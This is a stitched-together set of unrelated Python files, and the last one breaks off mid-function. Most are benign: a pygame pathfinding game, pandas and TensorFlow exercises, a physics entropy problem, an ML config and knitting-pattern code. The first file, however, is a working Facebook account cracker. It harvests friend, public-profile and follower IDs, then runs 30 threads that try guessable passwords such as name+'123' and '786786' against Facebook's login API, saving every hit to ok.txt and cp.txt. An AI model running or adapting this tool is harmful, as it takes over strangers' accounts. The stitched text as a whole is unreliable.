\033[1;97mGithub : github.com/FiazNiazi
\033[1;92mNote : FIAZ KING OF FB (ENJOY FREE CLONING)
\033[1;97m------------------------------------------------
"""
def main():
os.system("clear")
print logo
print("")
print("\033[0;97m( Cloning Main Menu )").center(50)
print("")
print("\033[1;97m(1)\033[1;91m -> \033[1;93mClone Public ID (Fast)")
print("")
print("\033[1;97m(2)\033[1;91m -> \033[1;93mOwner Info")
print("")
print("\033[1;97m(3)\033[1;91m -> \033[1;93mlogout tool")
print("")
main_select()
def main_select():
IKB = raw_input("\033[1;97m-> Select \033[1;93m ")
if IKB =="1":
login()
if IKB =="2":
os.system("xdg-open https://www.facebook.com/fiazkhan.fbhacker.king.of.fb")
main()
elif IKB =="0":
os.system("exit")
else:
print("-> Please select a valid option").center(50)
time.sleep(2)
main()
def login():
os.system("clear")
print logo
print("")
print("\033[0;97m( LOGIN MAIN MENU )").center(50)
print("")
print("\033[1;97m(1)\033[1;91m -> \033[1;93mLogin Using Token")
print("")
print("\033[1;97m(2)\033[1;91m -> \033[1;93mLogin Using ID/Password")
print("")
print("\033[1;97m(3)\033[1;91m -> \033[1;93mMain menu back")
print("")
login_select()
def login_select():
IKB = raw_input(" \033[1;97mOption -> \033[1;97m ")
if IKB =="1":
os.system("clear")
print logo
print("")
print("( Login With Token )").center(50)
print("")
token = raw_input("-> Paste Token Here \033[0;93m")
token_s = open(".fb_token.txt","w")
token_s.write(token)
token_s.close()
try:
r = requests.get("https://graph.facebook.com/me?access_token="+token)
q = json.loads(r.text)
name = q["name"]
nm = name.rsplit(" ")[0]
print("")
print("\033[1;92mYour Token Login Successfully").center(50)
time.sleep(1)
os.system("xdg-open https://www.facebook.com/fiazkhan.fbhacker.king.of.fb")
time.sleep(1)
menu()
except (KeyError , IOError):
print("")
print("\033[1;92mToken invalid or Account has checkpoint\033[0;93m").center(50)
print("")
time.sleep(2)
login()
elif IKB =="2":
login_fb()
elif IKB =="3":
main()
else:
print("")
print("Select a valid option").center(50)
print("")
login_select()
def login_fb():
os.system("clear")
print logo
print("")
print("[ login with ID/Password ]").center(50)
print("")
id = raw_input("\033[1;93m Email/ID/Number :\033[1;97m ")
id1 = id.replace(' ','')
id2 = id1.replace('(','')
uid = id2.replace(')','')
pwd = raw_input("\033[1;93m Password :\033[1;97m ")
print("")
data = requests.get("https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=1&email="+uid+"&locale=en_US&password="+pwd+"&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6", headers=header).text
q = json.loads(data)
if "access_token" in q:
login_s = open(".login.txt","w")
login_s.write(q["access_token"])
login_s.close()
print("\t\033[1;92mLogin Successfull\033[0;97m")
time.sleep(1)
menu()
else:
if "www.facebook.com" in q["error_msg"]:
print ("\n\033[1;93m-> Login Failed . Account Has a Checkpoint\033[0;97m")
time.sleep(1)
login_fb()
else:
print("\n\033[1;93m-> Login Failed.Email/ID/Number OR Password May BE Wrong\033[0;97m")
time.sleep(1)
login_fb()
def menu():
global token
os.system("clear")
print logo
try:
token = open(".fb_token.txt","r").read()
except (KeyError , IOError):
login()
try:
r = requests.get("https://graph.facebook.com/me?access_token="+token)
q = json.loads(r.text)
nm = q["name"]
nmf = nm.rsplit(" ")[0]
ok = nmf
except (KeyError , IOError):
print("")
print("login account has checkpoint").center(50)
print("")
os.system("rm -rf .fb_token.txt")
time.sleep(1)
login()
except requests.exceptions.ConnectionError:
print logo
print("")
print("Your internet connection failed").center(50)
print("")
time.sleep(2)
menu()
os.system("clear")
print logo
print("")
print("\t\033[1;92mLogin Account : " +nm)
print("")
print("\033[1;97m[1]\033[1;91m -> \033[1;93mCrack From Friendlist")
print("")
print("\033[1;97m[2]\033[1;91m -> \033[1;93mCrack From Public ID")
print("")
print("\033[1;97m[3]\033[1;91m -> \033[1;93mCrack From Followers ID")
print("")
print("\033[1;97m[0]\033[1;91m -> \033[1;93mlogout")
print("")
menu_select()
def menu_select():
select = raw_input("\033[1;97mOption : ")
id=[]
oks=[]
cps=[]
if select=="1":
os.system("clear")
print logo
print("")
r = requests.get("https://graph.facebook.com/me/friends?access_token="+token, headers=header)
z = json.loads(r.text)
for s in z["data"]:
uid=s['id']
na=s['name']
nm=na.rsplit(" ")[0]
id.append(uid+'|'+nm)
if select =="2":
os.system("clear")
print(logo)
print("")
idt = raw_input("\033[1;97m-> Put Public ID/Username :\033[1;93m ")
os.system("clear")
print logo
try:
r = requests.get("https://graph.facebook.com/"+idt+"?access_token="+token)
q = json.loads(r.text)
print("-> Account Name : "+q["name"])
except (KeyError , IOError):
print("")
print("\033[1;97your login account has checkpoint").center(50)
print("")
menu()
r = requests.get("https://graph.facebook.com/"+idt+"/friends?access_token="+token)
z = json.loads(r.text)
for i in z["data"]:
uid=i['id']
na=i['name']
nm=na.rsplit(" ")[0]
id.append(uid+'|'+nm)
elif select =="3":
os.system("clear")
print logo
print("")
idt = raw_input("\033[1;97m-> Put ID/Username :\033[1;93m ")
os.system("clear")
print logo
try:
r = requests.get("https://graph.facebook.com/"+idt+"?access_token="+token, headers=header)
q = json.loads(r.text)
print(" Account Name : "+q["name"])
except (KeyError , IOError):
print("")
print("\033[1;97m login id has checkpoint").center(50)
print("")
time.sleep(3)
menu()
r = requests.get("https://graph.facebook.com/"+idt+"/subscribers?access_token="+token+"&limit=5000", headers=header)
z = json.loads(r.text)
for i in z["data"]:
uid=i['id']
na=i['name']
nm=na.rsplit(" ")[0]
id.append(uid+'|'+nm)
elif select =="0":
os.system("exit")
else:
print("")
print("Please Select A Valid Option").center(50)
time.sleep(2)
menu_select()
print("\033[1;97m-> Total IDs : "+str(len(id)))
time.sleep(0.5)
print("\033[1;97m-> Please wait clone account will be appear here")
print 47*("-")
print('')
def main(arg):
user=arg
uid,name=user.split("|")
try:
pass1=name+"123"
q = requests.get("https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email=" + uid + "&locale=vi_vn&password=" + pass1 + "&sdk=ios&generate_session_cookies=1&sig=15df5f3c8c37e0a620e8fa1fd1dd705c", headers=header).text
d=json.loads(q)
if 'www.facebook.com' in d['error_msg']:
print("\x1b[1;93m[FIAZ-CP] "+uid+" | "+pass1)
cp=open("cp.txt","a")
cp.write(uid+" | "+pass1+"\n")
cp.close()
cps.append(uid)
else:
if "access_token" in d:
print("\x1b[1;97m[FIAZ-OK] "+uid+" | "+pass1+"\x1b[1;0m")
ok=open("ok.txt","a")
ok.write(uid+" | "+pass1+"\n")
ok.close()
oks.append(uid)
else:
pass2=name+"1234"
q = requests.get("https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email=" + uid + "&locale=vi_vn&password=" + pass2 + "&sdk=ios&generate_session_cookies=1&sig=15df5f3c8c37e0a620e8fa1fd1dd705c", headers=header).text
d=json.loads(q)
if 'www.facebook.com' in d['error_msg']:
print("\x1b[1;93m[FIAZ-CP] "+uid+" | "+pass2)
cp=open("cp.txt","a")
cp.write(uid+" | "+pass2+"\n")
cp.close()
cps.append(uid)
else:
if 'access_token' in d:
print("\x1b[1;97m[FIAZ-OK] "+uid+" | "+pass2+"\x1b[1;0m")
ok=open("ok.txt","a")
ok.write(uid+" | "+pass2+"\n")
ok.close()
oks.append(uid)
else:
pass3=name+"12345"
q = requests.get("https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email=" + uid + "&locale=vi_vn&password=" + pass3 + "&sdk=ios&generate_session_cookies=1&sig=15df5f3c8c37e0a620e8fa1fd1dd705c", headers=header).text
d=json.loads(q)
if 'www.facebook.com' in d['error_msg']:
print("\x1b[1;93m[FIAZ-CP] "+uid+" | "+pass3)
cp=open("cp.txt","a")
cp.write(uid+" | "+pass3+"\n")
cp.close()
cps.append(uid)
else:
if 'access_token' in d:
print(" \x1b[1;97m[FIAZ-OK] "+uid+" | "+pass3+"\x1b[1;0m")
ok=open("ok.txt","a")
ok.write(uid+" | "+pass3+"\n")
ok.close()
oks.append(uid)
else:
pass4=name+"786"
q = requests.get("https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email=" + uid + "&locale=vi_vn&password=" + pass4 + "&sdk=ios&generate_session_cookies=1&sig=15df5f3c8c37e0a620e8fa1fd1dd705c", headers=header).text
d=json.loads(q)
if 'www.facebook.com' in d['error_msg']:
print("\x1b[1;93m[FIAZ-CP] "+uid+" | "+pass4)
cp=open("cp.txt","a")
cp.write(uid+" | "+pass4+"\n")
cp.close()
cps.append(uid)
else:
if 'access_token' in d:
print("\x1b[1;97m[FIAZ-OK] "+uid+" | "+pass4+"\x1b[1;0m")
ok=open("ok.txt","a")
ok.write(uid+" | "+pass4+"\n")
ok.close()
oks.append(uid)
else:
pass5="786786"
q = requests.get("https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email=" + uid + "&locale=vi_vn&password=" + pass5 + "&sdk=ios&generate_session_cookies=1&sig=15df5f3c8c37e0a620e8fa1fd1dd705c", headers=header).text
d=json.loads(q)
if 'www.facebook.com' in d['error_msg']:
print("\x1b[1;93m[FIAZ-CP] "+uid+" | "+pass5)
cp=open("cp.txt","a")
cp.write(uid+" | "+pass5+"\n")
cp.close()
cps.append(uid)
else:
if 'access_token' in d:
print("\x1b[1;97m[FIAZ-OK] "+uid+" | "+pass5+"\x1b[1;0m")
ok=open("ok.txt","a")
ok.write(uid+" | "+pass5+"\n")
ok.close()
oks.append(uid)
else:
pass6="223344"
q = requests.get("https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email=" + uid + "&locale=vi_vn&password=" + pass6 + "&sdk=ios&generate_session_cookies=1&sig=15df5f3c8c37e0a620e8fa1fd1dd705c", headers=header).text
d=json.loads(q)
if 'www.facebook.com' in d['error_msg']:
print("\x1b[1;93m[FIAZ-CP] "+uid+" | "+pass6)
cp=open("cp.txt","a")
cp.write(uid+" | "+pass6+"\n")
cp.close()
cps.append(uid)
else:
if 'access_token' in d:
print("\x1b[1;97m[FIAZ-OK] "+uid+" | "+pass6+"\x1b[1;0m")
ok=open("ok.txt","a")
ok.write(uid+" | "+pass6+"\n")
ok.close()
oks.append(uid)
else:
pass7=name+"12"
q = requests.get("https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email=" + uid + "&locale=vi_vn&password=" + pass7 + "&sdk=ios&generate_session_cookies=1&sig=15df5f3c8c37e0a620e8fa1fd1dd705c", headers=header).text
d=json.loads(q)
if 'www.facebook.com' in d['error_msg']:
print("\x1b[1;93m[FIAZ-CP] "+uid+" | "+pass7)
cp=open("cp.txt","a")
cp.write(uid+" | "+pass7+"\n")
cp.close()
cps.append(uid)
else:
if 'access_token' in d:
print("\x1b[1;97m[FIAZ-OK] "+uid+" | "+pass7+"\x1b[1;0m")
ok=open("ok.txt","a")
ok.write(uid+" | "+pass7+"\n")
ok.close()
oks.append(uid)
except:
pass
p = ThreadPool(30)
p.map(main, id)
print (" ")
print (47*"-")
print ("-> Your Process has completed Successful")
print ("-> Total Cp/Ok : "+str(len(cps)) + "/"+str(len(oks)))
print (47*"-")
raw_input("\t\x1b[0;97mPress enter to main menu back")
menu()
if __name__ == '__main__':
main()
|
import staticjinja
if __name__ == "__main__":
site = staticjinja.make_site()
site.render()
|
import random
import pygame
from datahandler.entities import Enemy, Player, Direction
from datahandler.layout import Layout
from render.renderdatagenerator import render_data
from scripts.pathfindingapp import PathFindingApp
from scripts.algos.pathfinder import PathFinder
from scripts.algos.caveprocedural import CaveProcedural
from render.engine import RenderEngine
# Actual application to initialize pygame, RenderEngine, do canvas generation and pathfinding
class App:
def __init__(self, size=(80,40), sq_width=15, iterations=5):
self.sq_width = sq_width
self.size = size
self.screen_size = (self.size[0]*self.sq_width, self.size[1]*self.sq_width)
self.iterations = iterations
self.fps_cap = 5
self.wall_color = [95, 67, 42]
self.wall_border_color = [71, 54, 39]
self.room_color = [211, 255, 204]
self.font_type = 'Comic Sans MS'
self.font_size = 30
self.font_color = (255, 255, 255)
self.cave = CaveProcedural(layout=Layout(self.size))
self.cave.smoothing(iterations=self.iterations)
self.cave.detectRooms()
self.cave.connectRooms()
self.pathfinderapp = PathFindingApp(layout=self.cave.layout, pathfinder=PathFinder())
tile_pos = self.pathfinderapp.move_target()
self.player = Player(tile_pos, self._get_coordinates(tile_pos))
self.no_of_enemies = 1
self.enemies = self.init_enmies(self.no_of_enemies, speed=2)
self.renderEngine = self.init()
def _get_coordinates(self, tile_pos: tuple):
x, y = tile_pos
return ((x+0.5) * self.sq_width, (y+0.5) * self.sq_width)
def init_enmies(self, count: int, speed: int):
enemies = []
for i in range(count):
enemy_pos = self.pathfinderapp.new_follower(
ignore=[self.player.position]+list(map(lambda p: p.position,enemies)))
if enemy_pos:
enemies.append(Enemy(enemy_pos, speed=speed))
return enemies
def keymapHandler(self):
def keymap(event):
if event.type == pygame.KEYDOWN and event.key == pygame.K_SPACE:
player_tile = self.pathfinderapp.move_target(
ignore=[self.player.position] + list(map(lambda e: e.position,self.enemies)))
self.player.position = player_tile
self.player.coordinate = self._get_coordinates(player_tile)
self.player.directions = [Direction.NONE, Direction.NONE, Direction.NONE, Direction.NONE]
if (event.type == pygame.KEYDOWN or event.type == pygame.KEYUP):
if event.key == pygame.K_UP:
if event.type == pygame.KEYDOWN:
self.player.directions[0] = Direction.UP
elif event.type == pygame.KEYUP:
self.player.directions[0] = Direction.NONE
if event.key == pygame.K_RIGHT:
if event.type == pygame.KEYDOWN:
self.player.directions[1] = Direction.RIGHT
elif event.type == pygame.KEYUP:
self.player.directions[1] = Direction.NONE
if event.key == pygame.K_DOWN:
if event.type == pygame.KEYDOWN:
self.player.directions[2] = Direction.DOWN
elif event.type == pygame.KEYUP:
self.player.directions[2] = Direction.NONE
if event.key == pygame.K_LEFT:
if event.type == pygame.KEYDOWN:
self.player.directions[3] = Direction.LEFT
elif event.type == pygame.KEYUP:
self.player.directions[3] = Direction.NONE
return keymap
def updateHandler(self):
def update():
new_position = self.player.position
pos = None
for dir in self.player.directions:
pos = new_position[0] + dir.value[0], new_position[1] + dir.value[1]
pos = self.pathfinderapp.move_target(position=pos)
if not pos:
pos = new_position
else:
new_position = pos
if pos:
self.player.position = pos
for i in range(len(self.enemies)):
next_step = self.pathfinderapp.get_next_step(self.enemies[i].position)
if next_step is not self.player.position:
self.enemies[i].position = next_step
return update
def _rendertext(self, display, text: str, position: tuple):
font = pygame.font.SysFont(self.font_type, self.font_size)
textsurface = font.render(text, False, self.font_color)
display.blit(textsurface,position)
def renderHandler(self):
def render(display):
triangles, tags = render_data(self.cave.layout.grid, self.sq_width)
# display.fill(self.room_color)
pygame.draw.rect(display, self.room_color, rect=[0,0,self.screen_size[0], self.screen_size[1]])
pygame.draw.rect(display, tuple(map(lambda x: (x-20)%255,self.wall_color)),
[0, (self.size[1])*self.sq_width,self.screen_size[0], 200])
if self.player:
color = (0, 255, 0)
x, y = self.player.position
pygame.draw.circle(display, color,
((x+0.5) * self.sq_width, (y+0.5) * self.sq_width), self.sq_width/2, width=0)
if self.enemies:
color = (255, 0, 0)
for enemy in self.enemies:
x, y = enemy.position
pygame.draw.circle(display, color,
((x+0.5) * self.sq_width, (y+0.5) * self.sq_width), self.sq_width/2, width=0)
for i in range(len(triangles)):
tri = triangles[i]
tag = tags[i]
pygame.draw.polygon(display, self.wall_color, list(tri), width=0)
text = "World size: " + str(self.size)
self._rendertext(display, text, (20,(self.size[1]+2)*self.sq_width))
pygame.display.flip()
return render
def init(self):
return RenderEngine(list((1200, 600)), self.updateHandler(),
self.renderHandler(), self.keymapHandler(), self.fps_cap)
def start(self):
self.renderEngine.start()
|
# Preppin' Data 2021 Week 23
import pandas as pd
import numpy as np
# Load data
airlines = pd.read_excel('unprepped_data\\PD 2021 Wk 23 Input - NPS Input.xlsx', sheet_name='Airlines')
prep_air = pd.read_excel('unprepped_data\\PD 2021 Wk 23 Input - NPS Input.xlsx', sheet_name='Prep Air')
# Combine Prep Air dataset with other airlines
airline_df = pd.concat([airlines,prep_air])
# Exclude any airlines who have had less than 50 customers respond
airline_df['total reviews'] = airline_df.groupby('Airline')['CustomerID'].transform('count')
airline_df = airline_df.loc[airline_df['total reviews'] >= 50]
# Classify customer responses to the question in the following way:
# 0-6 = Detractors
# 7-8 = Passive
# 9-10 = Promoters
airline_df['Response Category'] = np.select(
[
airline_df['How likely are you to recommend this airline?'] <= 6,
airline_df['How likely are you to recommend this airline?'] <= 8,
airline_df['How likely are you to recommend this airline?'] <= 10
],
[
'Detractors',
'Passive',
'Promoters'
],
default='Unknown'
)
# Calculate the NPS for each airline
# NPS = % Promoters - % Detractors
# Note: I rounded the %s down to the nearest whole number, so if your answer differs slightly from mine then this could be why!
nps = airline_df[['Airline','Response Category']]
nps = nps.groupby(['Airline','Response Category'], as_index=False).size()
# Pivot columns to rows
nps = nps.pivot(index = 'Airline', columns = 'Response Category', values = 'size').reset_index()
nps['Total'] = nps['Detractors'] + nps['Passive'] + nps['Promoters']
# Rounding % Promoters & % Detactors before subtraction
nps['NPS Score % Rounded'] = np.floor((nps['Promoters']*100)/nps['Total']) - np.floor((nps['Detractors']*100)/nps['Total'])
# Calculate the average and standard deviation of the dataset
airline_stats = nps['NPS Score % Rounded'].agg({'average':'mean',"standard deviation": 'std'})
# Take each airline's NPS and subtract the average, then divide this by the standard deviation
nps['Z-Score'] = (nps['NPS Score % Rounded'] - airline_stats['average'])/airline_stats['standard deviation']
# Filter to just show Prep Air's NPS along with their Z-Score
# Output the data
output_df = nps.loc[nps['Airline'] == 'Prep Air']
output_df = output_df[['Airline','NPS Score % Rounded','Z-Score']]
output_df.to_csv('prepped_data\\PD 2021 Wk 23 Output.csv', encoding="utf-8-sig", index=False)
print("data prepped!")
|
"""
A physics textbook is pushed across the tabletop with a force
of 259 N over a distance of 2.3 m. The book slides across the
table and comes to a stop. The temperature of the entire system
(defined as the table, the book, and the surrounding air) is 295 K.
Part A:
What is the change in the internal energy of the system?
The amount of work done on the system is equal to
Work = Force * Distance
We know then that the amount of work added to the internal energy
of the system is:
Internal Energy
= force * distance
= 2.3 * 259
= 595.7 J
Part B:
Assuming that the temperature of the system does not
significantly change during this process, what is the
change in the entropy of this system?
In order to understand the next question we must be able to
understand that no significant change is occurring in the temperature
of the system. Meaning that the temperature of 295K will remain
consistent and a determining factor for the energy in the system.
Basically, we can use it as a ratio to compare the amount
of chaos that occurred in our system, which is the
ratio of internal energy change and the amount of temperature
that occurred initially:
ratioOfChange
= internalEnergyChange / temperatureInitial
= 2.0193220339
You can also see that the answer units are Joules per Kelvin
and the only energy we have is the change in energy
from the first equation and the initial temperature in Kelvin
"""
if __name__ == '__main__':
force = 259
distance = 2.3
initialTemperature = 295
work = force * distance
print "The total change in the amount of energy located in the system is:", work
ratioOfChange = work / initialTemperature
print "The change in entropy of the system is:", ratioOfChange
|
# Ejemplo de función filter
def es_impar(x):
return x % 2
print(list(filter(es_impar, range(10))))
|
def register(mf):
mf.register_default_module("batchnorm", required_event="normalization_layer", overwrite_globals={
"batchnorm.momentum": 0.05,
})
mf.register_default_module("onecyclelr", required_event="init_scheduler", overwrite_globals={
"onecyclelr.anneal_strategy": lambda state, event: state["grp.scheduler.onecyclelr.AnnealStrategy"].COS,
"onecyclelr.epochs_start": 0.1,
})
mf.load("..base")
mf.register_default_module(["train", "validate", "test"], required_event="main", overwrite_globals={
"main.epochs": 50,
"batchsize": 256,
})
mf.register_default_module("sgd", required_event="init_optimizer", overwrite_globals={
"sgd.momentum": 0.9,
"sgd.weight_decay": 2e-4,
"sgd.nesterov": True,
"sgd.lr": 0.8,
"onecyclelr.div_factor": 10,
"onecyclelr.final_div_factor": 1e3,
"onecyclelr.anneal_strategy": lambda state, event: state["grp.scheduler.onecyclelr.AnnealStrategy"].COS,
})
mf.register_default_module("adam", required_event="init_optimizer", overwrite_globals={
"adam.lr": 1e-3,
"adam.betas": (0.9, 0.99),
"adam.weight_decay": 1e-2,
"onecyclelr.div_factor": 1e10,
})
|
#!/usr/bin/python
import sys, getopt
import translate, calculateOrbs
#import xlsxwriter
import constants, aspects, shapes, modesElements
from itertools import groupby
from collections import Counter
def addPossPatternsForSpan(sign_degree_dict, rowNum, numRowsRepeat, possPatterns):
'''Add potential patterns for span by sign aspects'''
#For now only add possibles if there aren't any
if len(possPatterns) == 0:
rowAspects = aspects.addSignAspectsForSpan(sign_degree_dict, rowNum, numRowsRepeat, [])
possPatterns = getPatternsForAspectShapes(rowAspects)
return possPatterns
else:
return possPatterns
def getPatternsForAspectShapes(aspects):
poss_shapes = []
for asp in aspects:
#print("asp:", asp, "add:", constants.PATTERN_ASPECT_SHAPES[asp])
for ashape in constants.PATTERN_ASPECT_SHAPES[asp]:
poss_shapes.append(ashape)
#print("poss shapes:", poss_shapes, " for aspects:", aspects)
poss_patts = []
for patt in constants.PATTERN_SHAPES:
match_shapes = constants.PATTERN_SHAPES[patt]
for shp in match_shapes:
for pshp in poss_shapes:
if shp == pshp:
if patt not in poss_patts:
poss_patts.append(patt)
#print("poss patts:", poss_patts, " for aspects:", aspects)
somePatts = shapes.determineBestPatternsForShapeMatch(poss_patts, aspects)
return getJustPatternNames(somePatts)
def determineBestPatternBySomething(possPatts, numRowsRepeat, rowNum, sign_degree_dict, rowAspects):
##print("This row ", rowNum, " repeats ", numRowsRepeat)
bestPatt = ''
if type(possPatts[0]) is list:
#1. First narrow by score, but only if they got scored
narrowedByScorePatts = narrowPatternsByScore(possPatts)
isBest = pickIfOnePattern(narrowedByScorePatts)
if isBest not in ['None', 'Nope']:
##print("..Found best pattern by narrowing score ", isBest)
return isBest
''' This shouldn't happen
elif isBest in ['None']:
print("---Score killed all options!")'''
else:
narrowedByScorePatts = possPatts
# Let's look at the mult-add as it relates to the element and mode of this degree
maxRow = aspects.getValidMaxRow(rowNum + numRowsRepeat)
print(sign_degree_dict[rowNum], "-", sign_degree_dict[maxRow])
narrowedByModeElements = modesElements.narrowPatternsByModesElements(narrowedByScorePatts, sign_degree_dict[rowNum], sign_degree_dict[maxRow])
isBest = pickIfOnePattern(narrowedByModeElements)
if isBest not in ['None', 'Nope']:
##print("..Found best pattern by narrowing by modes/elements ", isBest)
return isBest
elif isBest not in ['None']:
narrowedByNumAspects = aspects.narrowByNumAspectStuff(narrowedByModeElements, rowAspects)
isBest = pickIfOnePattern(narrowedByNumAspects)
if isBest not in ['None', 'Nope']:
##print("...Found best pattern by narrowing by numAspects ", isBest)
return isBest
elif isBest not in ['None']:
#print("Couldn't narrow by num aspects (1)", narrowedByNumAspects)
#print("Forcing match:", narrowedByNumAspects)
bestPatt = forceRankPatternMatch(narrowedByNumAspects, sign_degree_dict[rowNum])
else:
#print("Forcing match (1):", narrowedByModeElements)
bestPatt = forceRankPatternMatch(narrowedByModeElements, sign_degree_dict[rowNum])
else:
#print("No match when narrow by mode/element", narrowedByModeElements)
narrowedByNumAspects = aspects.narrowByNumAspectStuff(narrowedByScorePatts, rowAspects)
isBest = pickIfOnePattern(narrowedByNumAspects)
if isBest not in ['None', 'Nope']:
##print("...Found best pattern by narrowing narrowedByScorePatts by numAspects ", isBest)
return isBest
elif isBest not in ['None']:
#print("Couldn't narrow by num aspects", narrowedByNumAspects)
#print("Forcing match:", narrowedByNumAspects)
bestPatt = forceRankPatternMatch(narrowedByNumAspects, sign_degree_dict[rowNum])
else:
#print("Forcing match:", narrowedByScorePatts)
bestPatt = forceRankPatternMatch(narrowedByScorePatts, sign_degree_dict[rowNum])
return bestPatt
def subtractFromLarger(v1, v2):
if v1 > v2:
return v1 - v2
else:
return v2 - v1
def forceRankPatternMatch(possPatts, signAtRowNum):
# Choose the pattern with the (mult+add) closest to the signAtRowNum score
meetScore = constants.SIGN_SCORE[signAtRowNum]
##print("meetScore:", meetScore)
bestPatts = []
closeCnt = 0
for patt in possPatts:
mult = constants.PATTERN_MULT_ADD[patt][0]
add = constants.PATTERN_MULT_ADD[patt][1]
totCnt = mult + add
compareCnt = subtractFromLarger(meetScore, totCnt)
##print("patt", patt, "totCnt:", totCnt, " closeCnt:", closeCnt, " bestPatts:", bestPatts, "compareCnt", compareCnt)
if compareCnt < closeCnt or len(bestPatts) == 0:
bestPatts.append(patt)
closeCnt = compareCnt
if len(bestPatts) > 1:
#Choose the pattern with the highest stitch count mult and add, added tog
maxCnt = 0
bestPatt = ''
for patt in possPatts:
mult = constants.PATTERN_MULT_ADD[patt][0]
add = constants.PATTERN_MULT_ADD[patt][1]
totCnt = mult + add
if totCnt > maxCnt:
bestPatt = patt
maxCnt = totCnt
else:
bestPatt = bestPatts[0]
##print("..Forcing match chose:", bestPatt)
return bestPatt
def determineHighScore(possPatts):
bestScore = 0
for score, patt in possPatts:
escore = eval(score)
if escore > bestScore:
bestScore = escore
#print("Best score:", bestScore)
return bestScore
def narrowPatternsByScore(possPatts):
narrowedPatts = []
highScore = determineHighScore(possPatts)
for score, patt in possPatts:
#print("score:", eval(score), " for patt", patt)
if eval(score) >= highScore:
narrowedPatts.append(patt)
return narrowedPatts
def pickIfOnePattern(bestPatts):
if len(bestPatts) == 1:
#print("...picking best patt:", bestPatts[0], type(bestPatts), type(bestPatts[0]))
if type(bestPatts[0]) is list:
return bestPatts[0][1]
else:
return bestPatts[0]
elif len(bestPatts) == 0:
return 'None'
else:
return 'Nope'
def getJustPatternNames(scoredPatts):
justPatts = []
for patt in scoredPatts:
justPatts.append(patt[1])
return justPatts
def getPatternsForRowCount(grouped_byAspect):
possible_patterns = []
for aspList, cnt in grouped_byAspect:
possible_patterns.append([aspList, cnt, getPatternsForCnt(cnt)])
return possible_patterns
def getPatternsForRowCountExpand(grouped_byAspect):
possible_patterns = []
for aspList, cnt in grouped_byAspect:
possible_patterns.append([aspList, cnt, getPatternsForCntExpand(cnt)])
return possible_patterns
def getPatternsForMaxRowCount(grouped_byAspect):
possible_patterns = []
for aspList, cnt in grouped_byAspect:
possible_patterns.append([aspList, cnt, getPatternsForCntMaxExpand(cnt)])
return possible_patterns
def getPatternsForCnt(cnt):
poss_pats = []
for pat in constants.PATTERN_ROWS:
# print(pat, constants.PATTERN_ROWS[pat])
if constants.PATTERN_ROWS[pat] == cnt:
poss_pats.append(pat)
return poss_pats
def getPatternsMatchingRows(possPatts, numRows):
matches = []
for pat in possPatts:
if constants.PATTERN_ROWS[pat] == numRows:
matches.append(pat)
return matches
def getPatternsForCntExpand(cnt):
poss_pats = []
for pat in constants.PATTERN_ROWS:
# print(pat, constants.PATTERN_ROWS[pat])
if constants.PATTERN_ROWS[pat] == cnt:
# Add all patterns that repeat over this exact #of rows
poss_pats.append(pat)
elif cnt > 1 and constants.PATTERN_ROWS[pat] % cnt == 0:
# Add all patterns that repeat over multiple of this #of rows, can be repeated
poss_pats.append(pat)
elif constants.PATTERN_ROWS[pat] == 1:
# Add all patterns that are only over a single row, since they can be repeated
poss_pats.append(pat)
return poss_pats
def getPatternsForCntMaxExpand(cnt):
poss_pats = []
for pat in constants.PATTERN_ROWS:
# print(pat, constants.PATTERN_ROWS[pat])
if constants.PATTERN_ROWS[pat] == cnt:
# Add all patterns that repeat over this exact #of rows
poss_pats.append(pat)
elif cnt > 1 and constants.PATTERN_ROWS[pat] % cnt == 0:
# Add all patterns that repeat over multiple of this #of rows, can be repeated
poss_pats.append(pat)
elif constants.PATTERN_ROWS[pat] == 1:
# Add all patterns that are only over a single row, since they can be repeated
poss_pats.append(pat)
elif constants.PATTERN_ROWS[pat] < cnt:
# Add all patterns that are less than this total #of rows, would be partial but possibly better shape match
poss_pats.append(pat)
return poss_pats
|
"""tf.expand_dims(input, dim, name = None)
解释:这个函数的作用是向input中插入维度是1的张量。
我们可以指定插入的位置dim,dim的索引从0开始,dim的值也可以是负数,从尾部开始插入,符合 python 的语法。
这个操作是非常有用的。举个例子,如果你有一张图片,数据维度是[height, width, channels],你想要加入“批量”这个信息,
那么你可以这样操作expand_dims(images, 0),那么该图片的维度就变成了[1, height, width, channels]。
这个操作要求:
-1-input.dims() <= dim <= input.dims()
这个操作是squeeze()函数的相反操作,可以一起灵活运用。"""
import tensorflow as tf
sess = tf.Session()
data = tf.constant([[1, 2, 1], [3, 1, 1]])
print(sess.run(tf.shape(data)))
# [2 3]
d_1 = tf.expand_dims(data, 0)
print(sess.run(tf.shape(d_1)))
# [1 2 3]
print("1:add dimension to 0 ", d_1)
# 1:add dimension to 0 Tensor("ExpandDims:0", shape=(1, 2, 3), dtype=int32)
d_1 = tf.expand_dims(d_1, 2)
print(sess.run(tf.shape(d_1)))
# [1 2 1 3]
print("2:add dimension to 2 ", d_1)
# 2:add dimension to 2 Tensor("ExpandDims_1:0", shape=(1, 2, 1, 3), dtype=int32)
d_1 = tf.expand_dims(d_1, -1)
print(sess.run(tf.shape(d_1)))
# [1 2 1 3 1]
print("3:add dimension to -1 ", d_1)
# 3:add dimension to -1 Tensor("ExpandDims_2:0", shape=(1, 2, 1, 3, 1), dtype=int32)
"""输入参数:
● input: 一个Tensor。
● dim: 一个Tensor,数据类型是int32,标量。
● name:(可选)为这个操作取一个名字。
输出参数:
● 一个Tensor,数据类型和输入数据相同,数据和input相同,但是维度增加了一维。"""
|
import sys
from computer import Computer
from copy import deepcopy
def move(comp, position, step_count):
step_count += 1
for i in range(4):
